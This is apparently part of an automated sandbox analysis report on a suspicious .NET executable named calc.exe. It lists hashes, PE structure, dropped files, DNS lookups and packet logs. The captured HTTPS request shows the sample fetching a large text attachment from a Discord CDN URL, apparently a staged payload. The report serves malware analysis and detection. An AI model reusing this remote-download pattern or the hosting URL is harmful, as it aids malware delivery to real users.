                                                                                                                                                                        SSDEEP:768:x9gc0ePkpr2VXpaMpcgf2o3xwpLWmGznT7HN5Gdc4:Tg1d2VZa8nDWW+
                                                                                                                                                                        MD5:25A44F9B6103D16CB905D821430BB344
                                                                                                                                                                        SHA1:DDAAD1AF35717569D3FE3C4E618FB7F5883FD988
                                                                                                                                                                        SHA-256:23D13B8CAD35DD4EBA460F8673DC58F0842880C7109700128DE50DD40008D836
                                                                                                                                                                        SHA-512:062BEA84D01B503CE9143DE4F970015CF35A1A7B546D86D6126B4B936899BE06EEB0A3628DEB422830FC13C2287846F0976BE7A4CAF00E58694A724226764034
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Reputation:low
                                                                                                                                                                        Preview: regfP...P...p.\..,.................. ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e...4............E.4............E.....5............E.rmtm.-".................................................................................................................................................................................................................................................................................................................................................RU&.HvLE.n......P...........7...3^..q....^...................................... ..hbin................p.\..,..........nk,..{0.........X........................... ...........................&...{ad79c032-a2ea-f756-e377-72fb9332c3ae}......nk ..{0......... ...........P............... .......Z.......................Root........lf......Root....nk ..{0......................}.............. ...............*...............DeviceCensus.......................vk..................WritePermissions
                                                                                                                                                                        \Device\ConDrv
                                                                                                                                                                        Process:C:\Users\user\Desktop\calc.exe
                                                                                                                                                                        File Type:ASCII text, with CRLF, LF line terminators
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):535
                                                                                                                                                                        Entropy (8bit):4.840369443408386
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:12:3EU6cTmDslPWUl8/2RdEB2XoQ/j1NiYiiZQhSe:0KIWPWUy/2dEB24abfe
                                                                                                                                                                        MD5:603AE28A4C3B3266A3A66CBEB32ADEAC
                                                                                                                                                                        SHA1:DA261060E90CB51C90FC6E004433558F776B3A91
                                                                                                                                                                        SHA-256:3746AD9375DC9DB19B934CBE8C4034091221508770A5854FDBFFADB4348E19FB
                                                                                                                                                                        SHA-512:37A4CBC5F6065F7ACAF92C928B0D45E74FA38018CEEAB20B1F1D608130EF1F030974A0DE0A4846ECB5732DB8799B86D4CA2F23F97B3E46B6A71F7CBC9ADE5630
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Reputation:low
                                                                                                                                                                        Preview: You must pick another side! This one is full..Proper formatting! GOOD! You can now reset your information...Unhandled Exception: System.Net.WebException: The remote server returned an error: (403) Forbidden... at System.Net.WebClient.DownloadDataInternal(Uri address, WebRequest& request).. at System.Net.WebClient.DownloadData(Uri address).. at System.Net.WebClient.DownloadData(String address).. at DarkEdition.Grogram.reload(String desi).. at DarkEdition.Grogram.assistant().. at DarkEdition.Program.Main(String[] args).

                                                                                                                                                                        Static File Info

                                                                                                                                                                        General

                                                                                                                                                                        File type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                        Entropy (8bit):4.465233635365889
                                                                                                                                                                        TrID:
                                                                                                                                                                        • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                                                                                                                        • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                                                                                                                        • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                                                                                        • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                                                                        • DOS Executable Generic (2002/1) 0.01%
                                                                                                                                                                        File name:calc.exe
                                                                                                                                                                        File size:192000
                                                                                                                                                                        MD5:ce76ae9d476b9c0daa25daf4c6dd4909
                                                                                                                                                                        SHA1:f574aa3bbe554363a6f6d1d648c31505bf92bfe5
                                                                                                                                                                        SHA256:05f3ac7f197b690f306c521b658c935fbf057d737ad6791cee6e2553b87d090b
                                                                                                                                                                        SHA512:b1537873ddbb5a3040220afdcf2159dc805602e7971af04bbb8a9115f771ca0c20dd06ab006aebf9def42cc38763fb5f9920b41011a8ba9ef3471f40eca4fa93
                                                                                                                                                                        SSDEEP:768:nJR9+3IvJOAHPv9fJLyhmqGdGgEVXxHtzjSjwoGHHHHHHHHHHHHvHLbchqTWyy65:nJNvTHL4mqGzEBxRjS0oP+qO/M6QO
                                                                                                                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...0&6..........."...0..............:... ...@....@.. .......................@............`................................

                                                                                                                                                                        File Icon

                                                                                                                                                                        Icon Hash:70848a8c8c8ac010

                                                                                                                                                                        Static PE Info

                                                                                                                                                                        General

                                                                                                                                                                        Entrypoint:0x403aaa
                                                                                                                                                                        Entrypoint Section:.text
                                                                                                                                                                        Digitally signed:false
                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                        Subsystem:windows cui
                                                                                                                                                                        Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                                                                                                        DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA
                                                                                                                                                                        Time Stamp:0xFB362630 [Mon Jul 23 10:32:16 2103 UTC]
                                                                                                                                                                        TLS Callbacks:
                                                                                                                                                                        CLR (.Net) Version:v4.0.30319
                                                                                                                                                                        OS Version Major:4
                                                                                                                                                                        OS Version Minor:0
                                                                                                                                                                        File Version Major:4
                                                                                                                                                                        File Version Minor:0
                                                                                                                                                                        Subsystem Version Major:4
                                                                                                                                                                        Subsystem Version Minor:0
                                                                                                                                                                        Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                                                                                                        Entrypoint Preview

                                                                                                                                                                        Instruction
                                                                                                                                                                        jmp dword ptr [00402000h]
                                                                                                                                                                        inc esi
                                                                                                                                                                        jne 00007F8BFC84CEC5h
                                                                                                                                                                        imul ecx, dword ptr [ebp+69h], 63h
                                                                                                                                                                        jc 00007F8BFC84CED1h
                                                                                                                                                                        jnc 00007F8BFC84CED1h
                                                                                                                                                                        je 0000CE94h
                                                                                                                                                                        xor dh, byte ptr [ebx]
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al

                                                                                                                                                                        Data Directories

                                                                                                                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x3a580x4f.text
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x40000x2cdf4.rsrc
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x320000xc.reloc
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x39980x38.text
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                        Sections

                                                                                                                                                                        NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                        .text0x20000x1ac00x1c00False0.518136160714PGP symmetric key encrypted data - Plaintext or unencrypted data5.23611813378IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                                                                                                        .rsrc0x40000x2cdf40x2ce00False0.165226758357data4.36692229858IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                        .reloc0x320000xc0x200False0.044921875data0.0815394123432IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                                                                        Resources

                                                                                                                                                                        NameRVASizeTypeLanguageCountry
                                                                                                                                                                        RT_ICON0x42200x336bPNG image data, 512 x 512, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                        RT_ICON0x759c0x19f9PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                        RT_ICON0x8fa80x10828dBase IV DBT, blocks size 0, block length 2048, next free block index 40, next free block 0, next used block 0
                                                                                                                                                                        RT_ICON0x197e00x94a8data
                                                                                                                                                                        RT_ICON0x22c980x5488data
                                                                                                                                                                        RT_ICON0x281300x4228dBase IV DBT of \200.DBF, blocks size 0, block length 16896, next free block index 40, next free block 4177526783, next used block 4294967047
                                                                                                                                                                        RT_ICON0x2c3680x25a8data
                                                                                                                                                                        RT_ICON0x2e9200x10a8data
                                                                                                                                                                        RT_ICON0x2f9d80x988data
                                                                                                                                                                        RT_ICON0x303700x468GLS_BINARY_LSB_FIRST
                                                                                                                                                                        RT_GROUP_ICON0x307e80x92data
                                                                                                                                                                        RT_VERSION0x3088c0x368data
                                                                                                                                                                        RT_MANIFEST0x30c040x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                                                                                                                                                                        Imports

                                                                                                                                                                        DLLImport
                                                                                                                                                                        mscoree.dll_CorExeMain

                                                                                                                                                                        Version Infos

                                                                                                                                                                        DescriptionData
                                                                                                                                                                        Translation0x0000 0x04b0
                                                                                                                                                                        LegalCopyrightCopyright 2021
                                                                                                                                                                        Assembly Version15.10.2.1
                                                                                                                                                                        InternalNamecalc.exe
                                                                                                                                                                        FileVersion15.10.2.1
                                                                                                                                                                        CompanyNameRepreIP
                                                                                                                                                                        LegalTrademarksSDK9OPS2
                                                                                                                                                                        CommentsDK5 Forensics tool and updater
                                                                                                                                                                        ProductNameSDK9OPS
                                                                                                                                                                        ProductVersion15.10.2.1
                                                                                                                                                                        FileDescriptionRepreIP
                                                                                                                                                                        OriginalFilenamecalc.exe

                                                                                                                                                                        Network Behavior

                                                                                                                                                                        Network Port Distribution

                                                                                                                                                                        TCP Packets

                                                                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                        Oct 28, 2021 04:56:05.441745996 CEST49706443192.168.2.5162.159.135.233
                                                                                                                                                                        Oct 28, 2021 04:56:05.441797018 CEST44349706162.159.135.233192.168.2.5
                                                                                                                                                                        Oct 28, 2021 04:56:05.441885948 CEST49706443192.168.2.5162.159.135.233
                                                                                                                                                                        Oct 28, 2021 04:56:05.473953962 CEST49706443192.168.2.5162.159.135.233
                                                                                                                                                                        Oct 28, 2021 04:56:05.473983049 CEST44349706162.159.135.233192.168.2.5
                                                                                                                                                                        Oct 28, 2021 04:56:05.521450996 CEST44349706162.159.135.233192.168.2.5
                                                                                                                                                                        Oct 28, 2021 04:56:05.521595955 CEST49706443192.168.2.5162.159.135.233
                                                                                                                                                                        Oct 28, 2021 04:56:05.525917053 CEST49706443192.168.2.5162.159.135.233
                                                                                                                                                                        Oct 28, 2021 04:56:05.525940895 CEST44349706162.159.135.233192.168.2.5
                                                                                                                                                                        Oct 28, 2021 04:56:05.526307106 CEST44349706162.159.135.233192.168.2.5
                                                                                                                                                                        Oct 28, 2021 04:56:05.570178032 CEST49706443192.168.2.5162.159.135.233
                                                                                                                                                                        Oct 28, 2021 04:56:05.892033100 CEST49706443192.168.2.5162.159.135.233
                                                                                                                                                                        Oct 28, 2021 04:56:05.926783085 CEST44349706162.159.135.233192.168.2.5
                                                                                                                                                                        Oct 28, 2021 04:56:05.926902056 CEST44349706162.159.135.233192.168.2.5
                                                                                                                                                                        Oct 28, 2021 04:56:05.926942110 CEST44349706162.159.135.233192.168.2.5
                                                                                                                                                                        Oct 28, 2021 04:56:05.926990032 CEST44349706162.159.135.233192.168.2.5
                                                                                                                                                                        Oct 28, 2021 04:56:05.926991940 CEST49706443192.168.2.5162.159.135.233
                                                                                                                                                                        Oct 28, 2021 04:56:05.927021980 CEST44349706162.159.135.233192.168.2.5
                                                                                                                                                                        Oct 28, 2021 04:56:05.927047014 CEST49706443192.168.2.5162.159.135.233
                                                                                                                                                                        Oct 28, 2021 04:56:05.927084923 CEST44349706162.159.135.233192.168.2.5
                                                                                                                                                                        Oct 28, 2021 04:56:05.927136898 CEST49706443192.168.2.5162.159.135.233
                                                                                                                                                                        Oct 28, 2021 04:56:05.927143097 CEST44349706162.159.135.233192.168.2.5
                                                                                                                                                                        Oct 28, 2021 04:56:05.927160978 CEST44349706162.159.135.233192.168.2.5
                                                                                                                                                                        Oct 28, 2021 04:56:05.927217960 CEST44349706162.159.135.233192.168.2.5
                                                                                                                                                                        Oct 28, 2021 04:56:05.927225113 CEST49706443192.168.2.5162.159.135.233
                                                                                                                                                                        Oct 28, 2021 04:56:05.927236080 CEST44349706162.159.135.233192.168.2.5
                                                                                                                                                                        Oct 28, 2021 04:56:05.927275896 CEST44349706162.159.135.233192.168.2.5
                                                                                                                                                                        Oct 28, 2021 04:56:05.927290916 CEST49706443192.168.2.5162.159.135.233
                                                                                                                                                                        Oct 28, 2021 04:56:05.927303076 CEST44349706162.159.135.233192.168.2.5
                                                                                                                                                                        Oct 28, 2021 04:56:05.927360058 CEST44349706162.159.135.233192.168.2.5
                                                                                                                                                                        Oct 28, 2021 04:56:05.927403927 CEST44349706162.159.135.233192.168.2.5
                                                                                                                                                                        Oct 28, 2021 04:56:05.927424908 CEST44349706162.159.135.233192.168.2.5
                                                                                                                                                                        Oct 28, 2021 04:56:05.927429914 CEST49706443192.168.2.5162.159.135.233
                                                                                                                                                                        Oct 28, 2021 04:56:05.927440882 CEST44349706162.159.135.233192.168.2.5
                                                                                                                                                                        Oct 28, 2021 04:56:05.927484035 CEST44349706162.159.135.233192.168.2.5
                                                                                                                                                                        Oct 28, 2021 04:56:05.927496910 CEST44349706162.159.135.233192.168.2.5
                                                                                                                                                                        Oct 28, 2021 04:56:05.927509069 CEST49706443192.168.2.5162.159.135.233
                                                                                                                                                                        Oct 28, 2021 04:56:05.927521944 CEST44349706162.159.135.233192.168.2.5
                                                                                                                                                                        Oct 28, 2021 04:56:05.927556992 CEST49706443192.168.2.5162.159.135.233
                                                                                                                                                                        Oct 28, 2021 04:56:05.927568913 CEST44349706162.159.135.233192.168.2.5
                                                                                                                                                                        Oct 28, 2021 04:56:05.927623034 CEST49706443192.168.2.5162.159.135.233
                                                                                                                                                                        Oct 28, 2021 04:56:05.927630901 CEST44349706162.159.135.233192.168.2.5
                                                                                                                                                                        Oct 28, 2021 04:56:05.927644968 CEST44349706162.159.135.233192.168.2.5
                                                                                                                                                                        Oct 28, 2021 04:56:05.927699089 CEST49706443192.168.2.5162.159.135.233
                                                                                                                                                                        Oct 28, 2021 04:56:05.927710056 CEST44349706162.159.135.233192.168.2.5
                                                                                                                                                                        Oct 28, 2021 04:56:05.927758932 CEST44349706162.159.135.233192.168.2.5
                                                                                                                                                                        Oct 28, 2021 04:56:05.927809000 CEST44349706162.159.135.233192.168.2.5
                                                                                                                                                                        Oct 28, 2021 04:56:05.927813053 CEST49706443192.168.2.5162.159.135.233
                                                                                                                                                                        Oct 28, 2021 04:56:05.927823067 CEST44349706162.159.135.233192.168.2.5
                                                                                                                                                                        Oct 28, 2021 04:56:05.927900076 CEST44349706162.159.135.233192.168.2.5
                                                                                                                                                                        Oct 28, 2021 04:56:05.927905083 CEST49706443192.168.2.5162.159.135.233
                                                                                                                                                                        Oct 28, 2021 04:56:05.927916050 CEST44349706162.159.135.233192.168.2.5
                                                                                                                                                                        Oct 28, 2021 04:56:05.927974939 CEST44349706162.159.135.233192.168.2.5
                                                                                                                                                                        Oct 28, 2021 04:56:05.927982092 CEST49706443192.168.2.5162.159.135.233
                                                                                                                                                                        Oct 28, 2021 04:56:05.927993059 CEST44349706162.159.135.233192.168.2.5
                                                                                                                                                                        Oct 28, 2021 04:56:05.928045988 CEST44349706162.159.135.233192.168.2.5
                                                                                                                                                                        Oct 28, 2021 04:56:05.928050041 CEST49706443192.168.2.5162.159.135.233
                                                                                                                                                                        Oct 28, 2021 04:56:05.928061008 CEST44349706162.159.135.233192.168.2.5
                                                                                                                                                                        Oct 28, 2021 04:56:05.928113937 CEST44349706162.159.135.233192.168.2.5
                                                                                                                                                                        Oct 28, 2021 04:56:05.928117037 CEST49706443192.168.2.5162.159.135.233
                                                                                                                                                                        Oct 28, 2021 04:56:05.928129911 CEST44349706162.159.135.233192.168.2.5
                                                                                                                                                                        Oct 28, 2021 04:56:05.928185940 CEST49706443192.168.2.5162.159.135.233
                                                                                                                                                                        Oct 28, 2021 04:56:05.928196907 CEST44349706162.159.135.233192.168.2.5
                                                                                                                                                                        Oct 28, 2021 04:56:05.928244114 CEST44349706162.159.135.233192.168.2.5
                                                                                                                                                                        Oct 28, 2021 04:56:05.928287983 CEST44349706162.159.135.233192.168.2.5
                                                                                                                                                                        Oct 28, 2021 04:56:05.928292990 CEST49706443192.168.2.5162.159.135.233
                                                                                                                                                                        Oct 28, 2021 04:56:05.928302050 CEST44349706162.159.135.233192.168.2.5
                                                                                                                                                                        Oct 28, 2021 04:56:05.928354979 CEST49706443192.168.2.5162.159.135.233
                                                                                                                                                                        Oct 28, 2021 04:56:05.928365946 CEST44349706162.159.135.233192.168.2.5
                                                                                                                                                                        Oct 28, 2021 04:56:05.928411007 CEST44349706162.159.135.233192.168.2.5
                                                                                                                                                                        Oct 28, 2021 04:56:05.928457975 CEST44349706162.159.135.233192.168.2.5
                                                                                                                                                                        Oct 28, 2021 04:56:05.928459883 CEST49706443192.168.2.5162.159.135.233
                                                                                                                                                                        Oct 28, 2021 04:56:05.928472996 CEST44349706162.159.135.233192.168.2.5
                                                                                                                                                                        Oct 28, 2021 04:56:05.928519011 CEST44349706162.159.135.233192.168.2.5
                                                                                                                                                                        Oct 28, 2021 04:56:05.928524017 CEST49706443192.168.2.5162.159.135.233
                                                                                                                                                                        Oct 28, 2021 04:56:05.928534985 CEST44349706162.159.135.233192.168.2.5
                                                                                                                                                                        Oct 28, 2021 04:56:05.928566933 CEST44349706162.159.135.233192.168.2.5
                                                                                                                                                                        Oct 28, 2021 04:56:05.928590059 CEST49706443192.168.2.5162.159.135.233
                                                                                                                                                                        Oct 28, 2021 04:56:05.928597927 CEST44349706162.159.135.233192.168.2.5
                                                                                                                                                                        Oct 28, 2021 04:56:05.928632021 CEST49706443192.168.2.5162.159.135.233
                                                                                                                                                                        Oct 28, 2021 04:56:05.944093943 CEST44349706162.159.135.233192.168.2.5
                                                                                                                                                                        Oct 28, 2021 04:56:05.944164038 CEST44349706162.159.135.233192.168.2.5
                                                                                                                                                                        Oct 28, 2021 04:56:05.944237947 CEST44349706162.159.135.233192.168.2.5
                                                                                                                                                                        Oct 28, 2021 04:56:05.944272041 CEST49706443192.168.2.5162.159.135.233
                                                                                                                                                                        Oct 28, 2021 04:56:05.944279909 CEST44349706162.159.135.233192.168.2.5
                                                                                                                                                                        Oct 28, 2021 04:56:05.944294930 CEST44349706162.159.135.233192.168.2.5
                                                                                                                                                                        Oct 28, 2021 04:56:05.944339037 CEST49706443192.168.2.5162.159.135.233
                                                                                                                                                                        Oct 28, 2021 04:56:05.944395065 CEST49706443192.168.2.5162.159.135.233
                                                                                                                                                                        Oct 28, 2021 04:56:05.944724083 CEST44349706162.159.135.233192.168.2.5
                                                                                                                                                                        Oct 28, 2021 04:56:05.944801092 CEST44349706162.159.135.233192.168.2.5
                                                                                                                                                                        Oct 28, 2021 04:56:05.944813967 CEST49706443192.168.2.5162.159.135.233
                                                                                                                                                                        Oct 28, 2021 04:56:05.944827080 CEST44349706162.159.135.233192.168.2.5
                                                                                                                                                                        Oct 28, 2021 04:56:05.944871902 CEST44349706162.159.135.233192.168.2.5
                                                                                                                                                                        Oct 28, 2021 04:56:05.944878101 CEST49706443192.168.2.5162.159.135.233
                                                                                                                                                                        Oct 28, 2021 04:56:05.944922924 CEST44349706162.159.135.233192.168.2.5
                                                                                                                                                                        Oct 28, 2021 04:56:05.944937944 CEST49706443192.168.2.5162.159.135.233
                                                                                                                                                                        Oct 28, 2021 04:56:05.944945097 CEST44349706162.159.135.233192.168.2.5
                                                                                                                                                                        Oct 28, 2021 04:56:05.944964886 CEST44349706162.159.135.233192.168.2.5
                                                                                                                                                                        Oct 28, 2021 04:56:05.945007086 CEST49706443192.168.2.5162.159.135.233
                                                                                                                                                                        Oct 28, 2021 04:56:05.945034981 CEST49706443192.168.2.5162.159.135.233

                                                                                                                                                                        UDP Packets

                                                                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                        Oct 28, 2021 04:56:05.348316908 CEST6434453192.168.2.58.8.8.8
                                                                                                                                                                        Oct 28, 2021 04:56:05.370219946 CEST53643448.8.8.8192.168.2.5

                                                                                                                                                                        DNS Queries

                                                                                                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                                                        Oct 28, 2021 04:56:05.348316908 CEST192.168.2.58.8.8.80xd31Standard query (0)cdn.discordapp.comA (IP address)IN (0x0001)

                                                                                                                                                                        DNS Answers

                                                                                                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                                                        Oct 28, 2021 04:56:05.370219946 CEST8.8.8.8192.168.2.50xd31No error (0)cdn.discordapp.com162.159.135.233A (IP address)IN (0x0001)
                                                                                                                                                                        Oct 28, 2021 04:56:05.370219946 CEST8.8.8.8192.168.2.50xd31No error (0)cdn.discordapp.com162.159.133.233A (IP address)IN (0x0001)
                                                                                                                                                                        Oct 28, 2021 04:56:05.370219946 CEST8.8.8.8192.168.2.50xd31No error (0)cdn.discordapp.com162.159.130.233A (IP address)IN (0x0001)
                                                                                                                                                                        Oct 28, 2021 04:56:05.370219946 CEST8.8.8.8192.168.2.50xd31No error (0)cdn.discordapp.com162.159.134.233A (IP address)IN (0x0001)
                                                                                                                                                                        Oct 28, 2021 04:56:05.370219946 CEST8.8.8.8192.168.2.50xd31No error (0)cdn.discordapp.com162.159.129.233A (IP address)IN (0x0001)

                                                                                                                                                                        HTTP Request Dependency Graph

                                                                                                                                                                        • cdn.discordapp.com

                                                                                                                                                                        HTTPS Proxied Packets

                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                        0192.168.2.549706162.159.135.233443C:\Users\user\Desktop\calc.exe
                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                        2021-10-28 02:56:05 UTC0OUTGET /attachments/897402450376536075/897465559711633408/8NMrqq.txt HTTP/1.1
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
                                                                                                                                                                        Host: cdn.discordapp.com
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        2021-10-28 02:56:05 UTC0INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Thu, 28 Oct 2021 02:56:05 GMT
                                                                                                                                                                        Content-Type: text/plain
                                                                                                                                                                        Content-Length: 1016519
                                                                                                                                                                        Connection: close
                                                                                                                                                                        CF-Ray: 6a50e394ee184321-FRA
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        Age: 523
                                                                                                                                                                        Cache-Control: public, max-age=31536000
                                                                                                                                                                        Content-Disposition: attachment;%20filename=8NMrqq.txt
                                                                                                                                                                        ETag: "5edcb658148b098b89d7e8e825a86af2"
                                                                                                                                                                        Expires: Fri, 28 Oct 2022 02:56:05 GMT
                                                                                                                                                                        Last-Modified: Tue, 12 Oct 2021 12:47:43 GMT
                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                        CF-Cache-Status: HIT
                                                                                                                                                                        Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                                                                                                                                                        Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                                                                                                        x-goog-generation: 1634042863594335
                                                                                                                                                                        x-goog-hash: crc32c=IK+c+g==
                                                                                                                                                                        x-goog-hash: md5=Xty2WBSLCYuJ1+joJahq8g==
                                                                                                                                                                        x-goog-metageneration: 1
                                                                                                                                                                        x-goog-storage-class: STANDARD
                                                                                                                                                                        x-goog-stored-content-encoding: identity
                                                                                                                                                                        x-goog-stored-content-length: 1016519
                                                                                                                                                                        X-GUploader-UploadID: ADPycdsJiMpPXHFTbjois8-RqQC1yRF-wmVQ54sc-h4rWQFKHQ3RAPbVkvg5TXOJKzLoqPUcfiY6ymKq3dOhnWTTOSwODCBpeQ
                                                                                                                                                                        X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=xN04eQe6HfHZ74y5c%2B0Tt9a%2FLDU4hyN9JDK0vGSHmhjNnlh3q426lgRKbMWqtdhF7HDyy4tjMrjCSn9lWIoJ3a6Mj1z5jKKBSu0Hp%2Flic7hmfGJMo%2FjDK6TCgSh4eQ2wmnsVVg%3D%3D"}],"group":"cf-nel","max_age":604800}
